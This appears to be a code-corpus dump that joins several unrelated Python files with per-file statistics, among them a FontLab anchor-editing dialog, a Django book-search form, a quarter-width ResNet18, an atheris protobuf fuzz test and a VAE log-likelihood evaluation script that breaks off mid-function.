        def on_Yplus5(self, code):
            if self.anchorList_selected:
                self.Yshift += self.k_MEDIUM_SHIFT
                self.d.PutValue('Yshift')
                self.updateYfinal()
                self.update_glyph()

        def on_glyphList(self, code):
            self.glyphList_selected = 1
            self.gHasAnchors = 1
            self.d.GetValue('glyphList')
            self.gName = self.glyphList[self.glyphList_index]  # Name of the glyph selected on the glyph list
            self.gIndex = f.FindGlyph(self.gName)
            fl.iglyph = self.gIndex  # Switch the glyph on the Glyph Window
            self.glyph = f[self.gIndex]
            self.updateAnchorsList()
            self.resetDialogValues()

        def on_anchorList(self, code):
            self.anchorList_selected = 1
            self.d.GetValue('anchorList')
            self.updateDialogValues()

        def on_RBmaster0(self, code): self.updateRBmaster(0)
        def on_RBmaster1(self, code): self.updateRBmaster(1)
        def on_RBmaster2(self, code): self.updateRBmaster(2)
        def on_RBmaster3(self, code): self.updateRBmaster(3)
        def on_RBmaster4(self, code): self.updateRBmaster(4)
        def on_RBmaster5(self, code): self.updateRBmaster(5)
        def on_RBmaster6(self, code): self.updateRBmaster(6)
        def on_RBmaster7(self, code): self.updateRBmaster(7)

        def on_ok(self, code):
            return 1

        #====== RESET FUNCTIONS =========

        def resetDialogValues(self):
            self.resetXorig()
            self.resetYorig()
            self.resetXshift()
            self.resetYshift()
            self.resetXfinal()
            self.resetYfinal()

        def resetXorig(self):
            self.Xorig = 0
            self.d.PutValue('Xorig')

        def resetYorig(self):
            self.Yorig = 0
            self.d.PutValue('Yorig')

        def resetXshift(self):
            self.Xshift = 0
            self.d.PutValue('Xshift')

        def resetYshift(self):
            self.Yshift = 0
            self.d.PutValue('Yshift')

        def resetXfinal(self):
            self.Xfinal = 0
            self.d.PutValue('Xfinal')

        def resetYfinal(self):
            self.Yfinal = 0
            self.d.PutValue('Yfinal')

        #====== UPDATE FUNCTIONS =========

        def updateRBmaster(self, newIndex):
            self.RBmasterIndex = newIndex
            if self.RBmasterIndex == 0: self.RBmaster0 = 1
            else: self.RBmaster0 = 0
            if self.RBmasterIndex == 1: self.RBmaster1 = 1
            else: self.RBmaster1 = 0
            if self.RBmasterIndex == 2: self.RBmaster2 = 1
            else: self.RBmaster2 = 0
            if self.RBmasterIndex == 3: self.RBmaster3 = 1
            else: self.RBmaster3 = 0
            if self.RBmasterIndex == 4: self.RBmaster4 = 1
            else: self.RBmaster4 = 0
            if self.RBmasterIndex == 5: self.RBmaster5 = 1
            else: self.RBmaster5 = 0
            if self.RBmasterIndex == 6: self.RBmaster6 = 1
            else: self.RBmaster6 = 0
            if self.RBmasterIndex == 7: self.RBmaster7 = 1
            else: self.RBmaster7 = 0
            for v in ['RBmaster0','RBmaster1','RBmaster2','RBmaster3','RBmaster4','RBmaster5','RBmaster6','RBmaster7']:
                self.d.PutValue(v)
            fl.layer = self.RBmasterIndex
            if self.gHasAnchors and self.anchorList_selected:
                self.updateDialogValues()

        def updateAnchorsList(self):
            self.anchorList = []
            for anchor in self.glyph.anchors:
                self.anchorList.append(anchor.name)
            self.d.PutValue('anchorList')
            self.anchorList_selected = 0
            self.selectedAnchor = None

        def updateDialogValues(self):
            self.selectedAnchor = self.glyph.anchors[self.anchorList_index].Layer(fl.layer)
            self.updateXorig(self.selectedAnchor.x)
            self.updateYorig(self.selectedAnchor.y)
            self.resetXshift()
            self.resetYshift()
            self.updateXfinal()
            self.updateYfinal()

        def updateXorig(self, pos):
            self.Xorig = pos
            self.d.PutValue('Xorig')

        def updateYorig(self, pos):
            self.Yorig = pos
            self.d.PutValue('Yorig')

        def updateXfinal(self):
            if self.anchorList_selected:
                self.Xfinal = self.Xorig + self.Xshift
                self.d.PutValue('Xfinal')

        def updateYfinal(self):
            if self.anchorList_selected:
                self.Yfinal = self.Yorig + self.Yshift
                self.d.PutValue('Yfinal')

        def update_glyph(self):
            if self.anchorList_selected:
                if self.gIndex not in glyphBkupDict:
                    # print "Made backup copy of '%s'" % self.glyph.name
                    glyphBkupDict[self.gIndex] = Glyph(f[self.gIndex])
                fl.SetUndo(self.gIndex)
                x = self.Xfinal
                y = self.Yfinal
                anchorPosition = Point(x, y)
                anchorIndex = self.anchorList_index
                anchor = self.glyph.anchors[anchorIndex]
                # In single master fonts the adjustment of the anchors cannot be handled by the codepath used for multiple
                # master fonts, because the UI gets updated but the changes are not stored in the VFB file upon saving.
                if masters == 1:
                    anchor.x = x
                    anchor.y = y
                else:
                    anchor.SetLayer(fl.layer, anchorPosition)
                fl.UpdateGlyph(self.gIndex)

        def Run(self):
            return self.d.Run()

    d = DialogClass()
    if d.Run() == 1:
        f.modified = 1
    else:
        for gID in glyphBkupDict:
            f[gID] = glyphBkupDict[gID]
            fl.UpdateGlyph(gID)
        f.modified = 0


if __name__ == "__main__":
    f = fl.font
    gIndex = fl.iglyph
    if f is None:
        fl.Message('No font opened')
    elif gIndex < 0:
        if len(listGlyphsSelected) == 0:
            fl.Message('Glyph selection is not valid')
        else:
            gIndex = listGlyphsSelected[0]
            run(gIndex)
    else:
        run(gIndex)
| 34.033175 | 125 | 0.694402 | 2,077 | 14,362 | 4.715455 | 0.181993 | 0.028589 | 0.041352 | 0.040025 | 0.418215 | 0.369512 | 0.35726 | 0.324382 | 0.317031 | 0.261793 | 0 | 0.046838 | 0.171982 | 14,362 | 421 | 126 | 34.114014 | 0.776741 | 0.050272 | 0 | 0.325648 | 0 | 0 | 0.163009 | 0.00367 | 0 | 0 | 0 | 0 | 0 | 1 | 0.118156 | false | 0 | 0 | 0.005764 | 0.132565 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
1a40884f8e3655b3dfc6d99906ed6b026d45047f | 661 | py | Python | Objects/Repeater.py | Camaendir/JB-LED | c6dba7264af3f6f9bc3b312d8afa24e2edebec5b | [
"MIT"
] | 3 | 2020-07-29T10:40:02.000Z | 2021-01-02T15:18:00.000Z | Objects/Repeater.py | Camaendir/JB-LED | c6dba7264af3f6f9bc3b312d8afa24e2edebec5b | [
"MIT"
] | 5 | 2020-10-01T18:28:39.000Z | 2020-10-08T19:17:44.000Z | Objects/Repeater.py | Camaendir/JB-LED | c6dba7264af3f6f9bc3b312d8afa24e2edebec5b | [
"MIT"
] | null | null | null | import copy
from math import floor

from Objects.Object import Object


class Repeater(Object):

    def __init__(self, isVisible, position, content, pixellength, numRepeats=-1, spacing=0):
        super().__init__(isVisible, position, content)
        self.numRepeats = numRepeats
        self.spacing = spacing
        self.pixellength = pixellength

    def getContent(self):
        # Maximum number of repetitions that fit on the strip, each repetition
        # being the content followed by ``spacing`` blank pixels.
        max_reps = floor(self.pixellength / (len(self.content) + self.spacing))
        reps = max_reps if self.numRepeats == -1 else min(self.numRepeats, max_reps)
        full = copy.deepcopy(self.content)
        full.extend([[-1, -1, -1]] * self.spacing)  # [-1, -1, -1] marks a blank spacer pixel
        return full * reps
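

# Usage sketch (illustrative only; the RGB triple format and the exact
# ``Object`` constructor arguments are assumptions based on the signature above):
def _repeater_example():
    # A red/green pattern separated by one blank pixel, tiled across a
    # 60-pixel strip as many times as it fits.
    pattern = Repeater(True, 0, [[255, 0, 0], [0, 255, 0]], pixellength=60, spacing=1)
    return pattern.getContent()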
| 31.47619 | 92 | 0.67171 | 80 | 661 | 5.4125 | 0.4 | 0.096998 | 0.110855 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.011605 | 0.217852 | 661 | 20 | 93 | 33.05 | 0.825919 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.133333 | false | 0 | 0.2 | 0 | 0.466667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
1a41f91574cc97294c624d878bae98006410b2d3 | 627 | py | Python | web/django/bookLib/bookLib/forms.py | hth945/pytest | 83e2aada82a2c6a0fdd1721320e5bf8b8fd59abc | [
"Apache-2.0"
] | null | null | null | web/django/bookLib/bookLib/forms.py | hth945/pytest | 83e2aada82a2c6a0fdd1721320e5bf8b8fd59abc | [
"Apache-2.0"
] | null | null | null | web/django/bookLib/bookLib/forms.py | hth945/pytest | 83e2aada82a2c6a0fdd1721320e5bf8b8fd59abc | [
"Apache-2.0"
] | null | null | null | from django import forms


class SearchForm(forms.Form):
    CHOICES = [
        (u'ISBN', u'ISBN'),
        (u'书名', u'书名'),  # "Title"
        (u'作者', u'作者')  # "Author"
    ]
    search_by = forms.ChoiceField(
        label='',
        choices=CHOICES,
        widget=forms.RadioSelect(),
        initial=u'书名',  # default to searching by title
    )
    keyword = forms.CharField(
        label='',
        max_length=32,
        widget=forms.TextInput(attrs={
            'class': 'form-control input-lg',
            'placeholder': u'请输入需要检索的图书信息',  # "Please enter the book information to search for"
            'name': 'keyword',
        })
    )
| 24.115385 | 49 | 0.432217 | 55 | 627 | 4.890909 | 0.581818 | 0.033457 | 0.04461 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005602 | 0.430622 | 627 | 26 | 50 | 24.115385 | 0.747899 | 0 | 0 | 0.090909 | 0 | 0 | 0.124204 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.045455 | 0 | 0.227273 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
1a424da371a77f49cafcf1b25908551d82fcf1e6 | 7,173 | py | Python | simpleview_pytorch/resnet.py | isaaccorley/simpleview-pytorch | 84a3e493905491feaed849a8bd5ddd240b2d04f2 | [
"MIT"
] | 9 | 2021-04-27T01:15:13.000Z | 2022-02-01T11:22:35.000Z | simpleview_pytorch/resnet.py | IsaacCorley/simpleview-pytorch | 84a3e493905491feaed849a8bd5ddd240b2d04f2 | [
"MIT"
] | 1 | 2021-05-18T12:24:04.000Z | 2021-06-12T05:09:27.000Z | simpleview_pytorch/resnet.py | IsaacCorley/simpleview-pytorch | 84a3e493905491feaed849a8bd5ddd240b2d04f2 | [
"MIT"
] | 1 | 2022-02-01T11:22:36.000Z | 2022-02-01T11:22:36.000Z | """
Modified from https://github.com/pytorch/vision/blob/master/torchvision/models/resnet.py

Edits:
    ResNet:
        - Changed input layer from 3 channel -> 1 channel (depth images)
        - Divided inplanes, planes, and width_per_group by 4
    BasicBlock:
        - Commented out ValueError triggered by base_width != 64

'To make the number of parameters comparable to point-based methods,
we use ResNet18 with one-fourth filters (ResNet18/4) as the backbone.'
"""
from typing import Type, Any, Callable, Union, List, Optional

import torch
import torch.nn as nn
from torchvision.models.resnet import (
    Bottleneck,
    conv3x3,
    conv1x1
)


class BasicBlock(nn.Module):
    expansion: int = 1

    def __init__(
        self,
        inplanes: int,
        planes: int,
        stride: int = 1,
        downsample: Optional[nn.Module] = None,
        groups: int = 1,
        base_width: int = 64,
        dilation: int = 1,
        norm_layer: Optional[Callable[..., nn.Module]] = None
    ) -> None:
        super().__init__()
        if norm_layer is None:
            norm_layer = nn.BatchNorm2d
        """
        if groups != 1 or base_width != 64:
            raise ValueError('BasicBlock only supports groups=1 and base_width=64')
        """
        if dilation > 1:
            raise NotImplementedError("Dilation > 1 not supported in BasicBlock")
        # Both self.conv1 and self.downsample layers downsample the input when stride != 1
        self.conv1 = conv3x3(inplanes, planes, stride)
        self.bn1 = norm_layer(planes)
        self.relu = nn.ReLU(inplace=True)
        self.conv2 = conv3x3(planes, planes)
        self.bn2 = norm_layer(planes)
        self.downsample = downsample
        self.stride = stride

    def forward(self, x: torch.Tensor) -> torch.Tensor:
        identity = x

        out = self.conv1(x)
        out = self.bn1(out)
        out = self.relu(out)

        out = self.conv2(out)
        out = self.bn2(out)

        if self.downsample is not None:
            identity = self.downsample(x)

        out += identity
        out = self.relu(out)

        return out


class ResNet_4(nn.Module):

    def __init__(
        self,
        block: Type[Union[BasicBlock, Bottleneck]],
        layers: List[int],
        num_classes: int = 1000,
        zero_init_residual: bool = False,
        groups: int = 1,
        width_per_group: int = 64//4,
        replace_stride_with_dilation: Optional[List[bool]] = None,
        norm_layer: Optional[Callable[..., nn.Module]] = None
    ) -> None:
        super().__init__()
        if norm_layer is None:
            norm_layer = nn.BatchNorm2d
        self._norm_layer = norm_layer

        self.inplanes = 64//4
        self.dilation = 1
        if replace_stride_with_dilation is None:
            # each element in the tuple indicates if we should replace
            # the 2x2 stride with a dilated convolution instead
            replace_stride_with_dilation = [False, False, False]
        if len(replace_stride_with_dilation) != 3:
            raise ValueError("replace_stride_with_dilation should be None "
                             "or a 3-element tuple, got {}".format(replace_stride_with_dilation))
        self.groups = groups
        self.base_width = width_per_group
        self.conv1 = nn.Conv2d(1, self.inplanes, kernel_size=7, stride=2, padding=3,
                               bias=False)
        self.bn1 = norm_layer(self.inplanes)
        self.relu = nn.ReLU(inplace=True)
        self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)
        self.layer1 = self._make_layer(block, 64//4, layers[0])
        self.layer2 = self._make_layer(block, 128//4, layers[1], stride=2,
                                       dilate=replace_stride_with_dilation[0])
        self.layer3 = self._make_layer(block, 256//4, layers[2], stride=2,
                                       dilate=replace_stride_with_dilation[1])
        self.layer4 = self._make_layer(block, 512//4, layers[3], stride=2,
                                       dilate=replace_stride_with_dilation[2])
        self.avgpool = nn.AdaptiveAvgPool2d((1, 1))
        self.fc = nn.Linear(512//4 * block.expansion, num_classes)

        for m in self.modules():
            if isinstance(m, nn.Conv2d):
                nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
            elif isinstance(m, (nn.BatchNorm2d, nn.GroupNorm)):
                nn.init.constant_(m.weight, 1)
                nn.init.constant_(m.bias, 0)

        # Zero-initialize the last BN in each residual branch,
        # so that the residual branch starts with zeros, and each residual block behaves like an identity.
        # This improves the model by 0.2~0.3% according to https://arxiv.org/abs/1706.02677
        if zero_init_residual:
            for m in self.modules():
                if isinstance(m, Bottleneck):
                    nn.init.constant_(m.bn3.weight, 0)  # type: ignore[arg-type]
                elif isinstance(m, BasicBlock):
                    nn.init.constant_(m.bn2.weight, 0)  # type: ignore[arg-type]

    def _make_layer(self, block: Type[Union[BasicBlock, Bottleneck]], planes: int, blocks: int,
                    stride: int = 1, dilate: bool = False) -> nn.Sequential:
        norm_layer = self._norm_layer
        downsample = None
        previous_dilation = self.dilation
        if dilate:
            self.dilation *= stride
            stride = 1
        if stride != 1 or self.inplanes != planes * block.expansion:
            downsample = nn.Sequential(
                conv1x1(self.inplanes, planes * block.expansion, stride),
                norm_layer(planes * block.expansion),
            )

        layers = []
        layers.append(block(self.inplanes, planes, stride, downsample, self.groups,
                            self.base_width, previous_dilation, norm_layer))
        self.inplanes = planes * block.expansion
        for _ in range(1, blocks):
            layers.append(block(self.inplanes, planes, groups=self.groups,
                                base_width=self.base_width, dilation=self.dilation,
                                norm_layer=norm_layer))

        return nn.Sequential(*layers)

    def _forward_impl(self, x: torch.Tensor) -> torch.Tensor:
        # See note [TorchScript super()]
        x = self.conv1(x)
        x = self.bn1(x)
        x = self.relu(x)
        x = self.maxpool(x)

        x = self.layer1(x)
        x = self.layer2(x)
        x = self.layer3(x)
        x = self.layer4(x)

        x = self.avgpool(x)
        x = torch.flatten(x, 1)
        x = self.fc(x)

        return x

    def forward(self, x: torch.Tensor) -> torch.Tensor:
        return self._forward_impl(x)


def resnet18_4() -> ResNet_4:
    """
    ResNet18/4: ResNet18 with 1/4 the filters

    Note: contains ~0.83M params which is close to the 0.8M params reported in paper
    """
    return ResNet_4(block=BasicBlock, layers=[2, 2, 2, 2])
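

# Quick sanity check (illustrative sketch, not part of the original module):
# count the trainable parameters of ResNet18/4 to confirm the ~0.83M figure
# quoted in the docstring above.
def _count_parameters() -> int:
    model = resnet18_4()
    return sum(p.numel() for p in model.parameters() if p.requires_grad)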
| 37.554974 | 107 | 0.577304 | 873 | 7,173 | 4.61512 | 0.239404 | 0.037975 | 0.037975 | 0.055845 | 0.198809 | 0.174981 | 0.120129 | 0.077439 | 0.04418 | 0.04418 | 0 | 0.033505 | 0.321762 | 7,173 | 190 | 108 | 37.752632 | 0.794656 | 0.149868 | 0 | 0.177778 | 0 | 0 | 0.021466 | 0.004887 | 0 | 0 | 0 | 0 | 0 | 1 | 0.051852 | false | 0 | 0.02963 | 0.007407 | 0.140741 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
1a43a46c11649f880078bee3e46cde206645701e | 641 | py | Python | contrib/libprotobuf_mutator/atheris_libprotobuf_mutator/proto_fuzz_test.py | muzmu/atheris | 7339163c634367dada8e5bca5bcceab8ada2b312 | [
"Apache-2.0"
] | null | null | null | contrib/libprotobuf_mutator/atheris_libprotobuf_mutator/proto_fuzz_test.py | muzmu/atheris | 7339163c634367dada8e5bca5bcceab8ada2b312 | [
"Apache-2.0"
] | null | null | null | contrib/libprotobuf_mutator/atheris_libprotobuf_mutator/proto_fuzz_test.py | muzmu/atheris | 7339163c634367dada8e5bca5bcceab8ada2b312 | [
"Apache-2.0"
] | null | null | null | import unittest

import atheris
import atheris_libprotobuf_mutator
from atheris import fuzz_test_lib
from google.protobuf import wrappers_pb2


@atheris.instrument_func
def simple_proto_comparison(msg):
    if msg.value == "abc":
        raise RuntimeError("Solved")


class AtherisLibprotobufMutatorTests(unittest.TestCase):

    def testSimpleProtoComparison(self):
        fuzz_test_lib.run_fuzztest(
            simple_proto_comparison,
            custom_setup=atheris_libprotobuf_mutator.Setup,
            setup_kwargs={"proto": wrappers_pb2.StringValue},
            expected_output=b"Solved",
            timeout=60)


if __name__ == "__main__":
    unittest.main()
| 22.892857 | 57 | 0.762871 | 73 | 641 | 6.328767 | 0.60274 | 0.056277 | 0.108225 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007407 | 0.157566 | 641 | 27 | 58 | 23.740741 | 0.848148 | 0 | 0 | 0 | 0 | 0 | 0.043682 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.105263 | false | 0 | 0.263158 | 0 | 0.421053 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
1a43e33d04e3f0eaf830b974bf544c32498255dc | 13,028 | py | Python | notebooks/generative.py | jacobdeasy/geometric-js | c4fd9d17672ac1aef2a95daeb7514ce7c20a469a | [
"MIT"
] | 14 | 2020-06-18T14:14:10.000Z | 2021-08-18T01:59:48.000Z | notebooks/generative.py | jacobdeasy/geometric-js | c4fd9d17672ac1aef2a95daeb7514ce7c20a469a | [
"MIT"
] | null | null | null | notebooks/generative.py | jacobdeasy/geometric-js | c4fd9d17672ac1aef2a95daeb7514ce7c20a469a | [
"MIT"
] | 2 | 2021-03-23T23:43:36.000Z | 2021-05-04T08:35:36.000Z | import matplotlib as mpl
import matplotlib.pyplot as plt
import numpy as np
import os
import pdb
from tqdm import tqdm
import argparse
import pandas as pd
import sys

BASE_DIR = os.path.dirname(os.getcwd())
sys.path.append(BASE_DIR)
sys.path.append('/home/tam63/geometric-js')
import torch
import scipy.stats
from scipy.stats import norm
from scipy.special import logsumexp
from vae.utils.modelIO import save_model, load_model, load_metadata
from notebooks.utils import PlotParams
# from utils.helpers import (create_safe_directory, get_device, set_seed,
# get_n_param)
TRAIN_MODELS_DIR = "/home/tam63/results/alpha-experiments"
DATA_DIR = "/home/tam63/geometric-js/data"
SAVE_DIR = "/home/tam63/figures/alpha-experiments"
def parse_arguments(args_to_parse):
    """Parse the command line arguments.

    Parameters
    ----------
    args_to_parse: list of str
        Arguments to parse (split on whitespace).
    """
    description = "PyTorch implementation and evaluation of Variational " + \
                  "AutoEncoders and metrics."
    parser = argparse.ArgumentParser(description=description)

    # General options
    general = parser.add_argument_group('General options')
    general.add_argument('--dataset', type=str, choices=['mnist', 'fashion', 'dsprites'],
                         help="Name of the dataset being plotted.")
    general.add_argument('--divergence', type=str, choices=['dGJS', 'GJS', 'both'],
                         help="Type of geometric-JS divergence to be plotted on comparison plot.")
    general.add_argument('--model-loc', type=str,
                         help="Location of the trained models to be used to generate plots.")

    args = parser.parse_args(args_to_parse)
    print(args)
    return args
def bootstrap(x, low, high, n_samples):
    """Bootstrap confidence interval for the mean of ``x`` at the
    (low, high) percentiles, using ``n_samples`` resamples."""
    mu = x.mean()
    n = len(x)
    X = np.random.choice(x, size=n_samples*n).reshape(n_samples, n)
    mu_star = X.mean(axis=1)
    d_star = np.sort(mu_star - mu)
    return mu, mu + d_star[int(low*n_samples)], mu + d_star[int(high*n_samples)]
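

# Illustrative usage sketch for ``bootstrap`` (not called by the pipeline):
# estimate a 95% confidence interval for the mean of synthetic data.
def _bootstrap_example():
    x = np.random.normal(loc=0.0, scale=1.0, size=500)
    mu, lb, ub = bootstrap(x, low=0.025, high=0.975, n_samples=1000)
    print("mean = %.3f (95%% CI: [%.3f, %.3f])" % (mu, lb, ub))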
def compute_samples(model, data, num_samples, debug=False):
    """
    Description
    ---------------------------------------------------------------
    Sample from importance distribution z_samples ~ q(z|X) and
    compute p(z_samples), q(z_samples) for importance sampling.

    Inputs
    ---------------------------------------------------------------
    model : pytorch nn.Module
        VAE model implemented in pytorch which has been
        trained on the training data corresponding to the
        passed test data, which is contained in the variable
        'data'.

    data : pytorch Tensor
        Tensor of shape [batch_size, 1, im_size, im_size],
        where im_size is the dimension size of the images used
        to train the model, and batch_size is the number of
        data instances passed, which is therefore also the
        number of estimates of the probability distribution
        which will be produced.

    num_samples : int
        For each passed data instance, the probability
        distribution p(x|z) will be estimated using a Monte
        Carlo integration with num_samples samples.

    Returns
    ---------------------------------------------------------------
    z_samples, pz, qz : numpy array
        Returns arrays containing the representation of each
        passed input image in latent space in z_samples, and the
        probability distributions qz and pz, given by the
        encoder's posterior q(z|x) evaluated at the sampled
        points (qz) and by the standard normal prior evaluated
        at the same points (pz).
    """
    data = data.cuda()
    z_mean, z_log_sigma = model.encoder(data)
    z_mean = z_mean.cpu().detach().numpy()
    z_log_sigma = z_log_sigma.cpu().detach().numpy()
    z_samples = []
    qz = []

    for m, s in zip(z_mean, z_log_sigma):
        # len(m) = len(s) = 10 = size of the latent space dimension
        #
        # z_vals is num_samples (= 128) samples drawn from the normal
        # distribution defined by the mean and std (m[i], s[i])
        #
        # qz_vals is the normal density evaluated at the samples
        # in the vector z_vals
        z_vals = [np.random.normal(m[i], np.exp(s[i]), num_samples) for i in range(len(m))]
        qz_vals = [norm.pdf(z_vals[i], loc=m[i], scale=np.exp(s[i])) for i in range(len(m))]
        z_samples.append(z_vals)
        qz.append(qz_vals)

    z_samples = np.array(z_samples)
    pz = norm.pdf(z_samples)
    qz = np.array(qz)

    # Swap axes so the sample dimension comes before the latent dimension:
    # (batch, latent_dim, num_samples) -> (batch, num_samples, latent_dim).
    z_samples = np.swapaxes(z_samples, 1, 2)
    pz = np.swapaxes(pz, 1, 2)
    qz = np.swapaxes(qz, 1, 2)

    return z_samples, pz, qz
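

# The quantities returned above feed the importance-sampling estimator
#   log p(x) ~= -log(N) + logsumexp_i[ log p(x|z_i) + log p(z_i) - log q(z_i) ],
# with z_i ~ q(z|x). The helper below is an illustrative sketch of that
# identity on precomputed log-terms; it is not called by the pipeline.
def _importance_logpx(logp_xz, logpz, logqz):
    # logp_xz, logpz, logqz: arrays of shape (num_samples,)
    num_samples = len(logp_xz)
    return -np.log(num_samples) + logsumexp(logp_xz + logpz - logqz)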
def estimate_logpx_batch(model, data, num_samples, debug=False, digit_size=32):
    """Estimate log p(x) for each datum in ``data`` by importance sampling
    with ``num_samples`` latent samples per datum (see compute_samples)."""
    z_samples, pz, qz = compute_samples(model, data, num_samples)
    assert len(z_samples) == len(data)
    assert len(z_samples) == len(pz)
    assert len(z_samples) == len(qz)

    z_samples = torch.tensor(z_samples).float().cuda()
    result = []
    for i in range(len(data)):
        x_predict = model.decoder(z_samples[i]).reshape(-1, digit_size ** 2)
        x_predict = x_predict.cpu().detach().numpy()
        x_predict = np.clip(x_predict, np.finfo(float).eps, 1. - np.finfo(float).eps)
        p_vals = pz[i]
        q_vals = qz[i]
        datum = data[i].cpu().reshape(digit_size ** 2).numpy()

        # \log p(x|z) = Binary cross entropy
        logp_xz = np.sum(datum * np.log(x_predict + 1e-9) + (1. - datum) * np.log(1.0 - x_predict + 1e-9), axis=-1)
        logpz = np.sum(np.log(p_vals + 1e-9), axis=-1)
        logqz = np.sum(np.log(q_vals + 1e-9), axis=-1)
        argsum = logp_xz + logpz - logqz
        logpx = -np.log(num_samples + 1e-9) + logsumexp(argsum)
        result.append(logpx)

    return np.array(result)
def estimate_logpx(model, data, num_samples, verbosity=0, digit_size=32):
    batches = []
    iterations = int(np.ceil(1. * len(data) / 100))
    for b in tqdm(range(iterations)):
        batch_data = data[b * 100:(b + 1) * 100]
        batches.append(estimate_logpx_batch(model, batch_data, num_samples, digit_size=digit_size))
        if verbosity and b % max(11 - verbosity, 1) == 0:
            print("Batch %d [%d, %d): %.2f" % (b, b * 100, (b+1) * 100, np.mean(np.concatenate(batches))))

    log_probs = np.concatenate(batches)
    mu, lb, ub = bootstrap(log_probs, 0.025, 0.975, 1000)
    return mu, lb, ub
def main(args):
    device = 'cuda'
    plotter = PlotParams()
    plotter.set_params()
    DATA_DIR = os.path.join(os.pardir, 'data')
    FIG_DIR = os.path.join(os.pardir, 'figs')
    RES_DIR = os.path.join(os.pardir, 'results')

    # 1) select dataset to load:
    if args.dataset == 'dsprites':
        X_test = np.load(os.path.join(DATA_DIR, 'dsprites', 'dsprite_train.npz'))['imgs']
        X_test = torch.tensor(X_test).unsqueeze(1).float() / 255.0
        digit_size = 64
        X_test = X_test[:10000]
        X_test = X_test.to(device)
    elif args.dataset == 'fashion':
        X_test = torch.load(os.path.join(DATA_DIR, 'fashionMnist', 'FashionMNIST', 'processed', 'test.pt'))
        digit_size = 32
        X_test = X_test[0].unsqueeze(1).float() / 255.0
        X_test = torch.nn.functional.pad(X_test, pad=(2, 2, 2, 2))
        X_test = X_test[:10000]
        X_test = X_test.to(device)
    elif args.dataset == 'mnist':
        X_test = torch.load(os.path.join(DATA_DIR, 'mnist', 'MNIST', 'processed', 'test.pt'))
        digit_size = 32
        X_test = X_test[0].unsqueeze(1).float() / 255.0
        X_test = torch.nn.functional.pad(X_test, pad=(2, 2, 2, 2))
        X_test = X_test[:10000]
        X_test = X_test.to(device)

    # 2) Get the trained alpha dGJS probabilities:
    av_a = []
    log_probs_lb = []
    log_probs_ub = []
    log_probs_mu = []
    log_probs_best = -np.inf

    if args.divergence in ['GJS', 'dGJS']:
        divergence = args.divergence
        for initial_a in [i/10 for i in range(11)]:
            model_path = f"{TRAIN_MODELS_DIR}/{args.dataset}/{args.model_loc}/{divergence}-A_0={initial_a}"
            model = load_model(model_path)
            logpx_mu, logpx_lb, logpx_ub = estimate_logpx(model, X_test, num_samples=128, verbosity=0, digit_size=digit_size)
            log_probs_mu += [logpx_mu]
            log_probs_lb += [logpx_lb]
            log_probs_ub += [logpx_ub]
            if logpx_mu > log_probs_best:
                model_best = model_path
                log_probs_best = logpx_mu
            print(model_path)
            print("log p(x) = %.2f (%.2f, %.2f)" % (logpx_mu, logpx_lb, logpx_ub))

    # 3) Get the comparison divergence probabilities. The KL, fwdKL and MMD
    # baselines share the same evaluation steps, so they are run in one loop:
    log_probs_lb_i = []
    log_probs_ub_i = []
    log_probs_mu_i = []
    model_names = []

    for divergence_name in ["KL", "fwdKL", "MMD"]:
        model_path = f"{TRAIN_MODELS_DIR}/{args.dataset}/{args.model_loc}/{divergence_name}"
        model = load_model(model_path)
        logpx_mu, logpx_lb, logpx_ub = estimate_logpx(model, X_test, num_samples=128, verbosity=0, digit_size=digit_size)
        log_probs_mu_i += [logpx_mu]
        log_probs_lb_i += [logpx_lb]
        log_probs_ub_i += [logpx_ub]
        model_names.append(divergence_name)
        print(model_path)
        print("log p(x) = %.2f (%.2f, %.2f)" % (logpx_mu, logpx_lb, logpx_ub))

    # The "no-constraint" baseline was left disabled in the original runs;
    # to include it, append "no-constraint" to the list above.

    # 4) Plot:
    fig = plt.figure(figsize=(10, 10))
    yerr_bar = np.array(log_probs_ub) - np.array(log_probs_lb)
    yerr_bar_i = np.array(log_probs_ub_i) - np.array(log_probs_lb_i)
    initial_a = [i/10 for i in range(11)]
    plt.errorbar(initial_a, log_probs_mu, yerr=yerr_bar, label=args.divergence)
    for i in range(len(model_names)):
        plt.errorbar(initial_a, [log_probs_mu_i[i]] * len(initial_a), yerr=[yerr_bar_i[i]] * len(initial_a), label=model_names[i])
    plt.xlabel(r'Initial $\alpha$')
    plt.ylabel(r'$\log(p_{\theta}(X))$')
    plt.legend()
